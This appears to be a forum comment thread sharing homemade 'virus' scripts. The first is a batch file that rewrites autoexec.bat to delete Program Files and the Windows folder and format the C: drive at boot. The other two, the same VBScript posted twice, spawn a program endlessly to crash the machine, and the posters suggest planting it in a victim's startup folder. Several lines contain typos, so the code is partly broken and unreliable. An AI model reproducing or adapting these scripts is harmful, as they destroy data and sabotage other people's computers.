you can make it easy .. creat a notpad and copy this ( echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* nul >>c:\autoexec.bat
echo copy c:\******s\command\forma.com c:\ >nul >>c:\autoexe.bat
echo copy c:\******s\command/deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltre /y c:\******s\*.* >nul >>c:\autoexec.bat
echoformat c:/q /u /autotest >nul >>c:\autoexe.bat ) and save it as a name AUTOEXE.bat and ull have a danger virus .. don't exute it xD
ANOTHER ONE
here copy this to notepad and save it as something.vbs and click on it, it will only crash ur computer but u can put it in da startup folder of da victims computer:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
it only works with windows xp
ANOTHER
here copy this to notepad and save it as something.vbs and click on it, it will only crash ur computer but u can put it in da startup folder of da victims computer:
Option Explicit
Dim WSHShell
Set WSHShell=Wscript.CreateObject("Wscript.Shell")
Dim x
For x = 1 to 100000000
WSHShell.Run "Tourstart.exe"
Next
it only works with windows xp
I appreciate ur knowledge. I just wnt 2 know, wht's this .vbs files? Hopefully visual basic script. If yes plz tell me how these work. How dose windows execute these, and can these be executde on other ops as well?
No comments:
Post a Comment